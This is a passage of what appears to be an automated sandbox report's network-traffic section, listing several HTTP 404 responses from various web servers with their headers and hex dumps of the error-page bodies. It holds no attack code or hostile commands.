1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:57:56 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2F6r0VbfSlBrKDvHw5UcOQmwubrjr7On0EU96h1azsBE00BDqBsuvFJm7MgOxaDvQArDDlBqRA4NAWCIvWUWW%2BmOF%2BzBdvc%2BywGYmPgTKm11Mej%2Fam4pV9gQVEG4%2FDAEhcNDEXa3A9U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec57121ce4cd9b9-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=126193&min_rtt=126193&rtt_var=63096&sent=3&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7939&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:57:59 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3sVGni9JOIlMPUuWw8s7Klc3Bya8rScV1pDh3A0O089tzEpZKxTnidLz0QgTp9G3yOAo5WpbJkzP6ws0fPkEqIuf55l7NArQ2su3VHV5Y7TXBwCcPYF%2F8ZZeRaJGazlVxIydtsU6FlM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec571325a157497-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=126725&min_rtt=126725&rtt_var=63362&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=491&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 17:58:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 17:58:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 17:58:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 17:58:13 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 17:58:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:59:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 